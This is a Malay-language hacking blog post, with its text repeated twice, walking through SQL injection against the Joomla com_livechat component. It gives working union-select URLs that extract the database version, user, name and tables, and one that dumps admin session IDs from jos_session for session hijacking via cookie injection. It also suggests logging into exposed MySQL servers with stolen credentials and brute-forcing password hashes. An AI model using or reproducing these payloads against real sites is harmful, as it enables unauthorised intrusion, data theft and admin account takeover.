Hmm.. banyak exploit code pasal joomla component yang selalu dipublishkan kat milw0rm. Tapi problemnya, bila kita nak crack hash yang kita dapat, payah.. sebab dia ada salt.
Tadi aku ada nengok sikit code authentication joomla ni, rasanya macam paham la sikit2.. insya ALLAH ada masa nanti aku bincangkan kat sini. (letih dah ni.. nak tidor)
Aku ada buat sikit test, tujuan kita/hackers nak hack website ni ada dua.
1. nak deface
2. sekadar poc/nak view maklumat yang mungkin sensitif
Secara peribadi, aku ni jenis yang no 2 kot
So kat sini aku bagi sikit tips dan trick. (Aku memang minat SQL injection, so aku manipulate sikit exploit com_livechat tu)
Macam biasa, mula-mula dapat version number dulu
Pastu dapatkan username system/database. Untuk password tu pandai-pandai la yer. Bila dah dapat, try scan target. Kalau port mysql dibuka, why not connect dengan target mysql tu menggunakan credentials yang kita dapat?
NI pulak untuk dapatkan nama database. Benda ni amat berguna untuk step step yang lebih advance
Cuba carik table lain selain dari table joomla tersebut. Mungkin ada table lain yang menyimpan data yang lebih menarik . NI codenya
Dan part yang paling best. Korang pernah tak kaji table jos_session dalam joomla? Huhuhu.. Cuba studi sikit pasal table jos_session tu.. ada rahsia besar disebalik table tu.. huhuh.. cuba dapatkan session ketika admin login dalam page, pastu buat cookie injection. Mana tahu bila kita refresh page kita leh dapat masuk admin page? Huhuh. Ni code dia
Kita kena fikir lebih luas dan lebih dalam. Aku lebih suka explore dari deface.. mungkin macam kata bro ak47suk1 la.. maybe i am a white hat
Nanti ada masa kita bincangkan algoritma yang digunakan oleh joomla untuk tujuan hashing. Bila dah faham algo dia, mungkin mudah sikit untuk kita buat tools/script untuk brute force
Tadi aku ada nengok sikit code authentication joomla ni, rasanya macam paham la sikit2.. insya ALLAH ada masa nanti aku bincangkan kat sini. (letih dah ni.. nak tidor)
Aku ada buat sikit test, tujuan kita/hackers nak hack website ni ada dua.
1. nak deface
2. sekadar poc/nak view maklumat yang mungkin sensitif
Secara peribadi, aku ni jenis yang no 2 kot
So kat sini aku bagi sikit tips dan trick. (Aku memang minat SQL injection, so aku manipulate sikit exploit com_livechat tu)
Macam biasa, mula-mula dapat version number dulu
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,@@version,3
Pastu dapatkan username system/database. Untuk password tu pandai-pandai la yer. Bila dah dapat, try scan target. Kalau port mysql dibuka, why not connect dengan target mysql tu menggunakan credentials yang kita dapat?
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,user(),3
NI pulak untuk dapatkan nama database. Benda ni amat berguna untuk step step yang lebih advance
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,database(),3
Cuba carik table lain selain dari table joomla tersebut. Mungkin ada table lain yang menyimpan data yang lebih menarik . NI codenya
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,table_name,3+from+information_schema.tables+limit+0,1/*
Dan part yang paling best. Korang pernah tak kaji table jos_session dalam joomla? Huhuhu.. Cuba studi sikit pasal table jos_session tu.. ada rahsia besar disebalik table tu.. huhuh.. cuba dapatkan session ketika admin login dalam page, pastu buat cookie injection. Mana tahu bila kita refresh page kita leh dapat masuk admin page? Huhuh. Ni code dia
http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,unhex(hex(concat(username,0x3a,session_id))),3+from+jos_session
Kita kena fikir lebih luas dan lebih dalam. Aku lebih suka explore dari deface.. mungkin macam kata bro ak47suk1 la.. maybe i am a white hat
Nanti ada masa kita bincangkan algoritma yang digunakan oleh joomla untuk tujuan hashing. Bila dah faham algo dia, mungkin mudah sikit untuk kita buat tools/script untuk brute force
0 Responses
Post a Comment
Subscribe to:
Post Comments (Atom)
Sistem Penyemakan Saman Berkomputer
Besut Organization.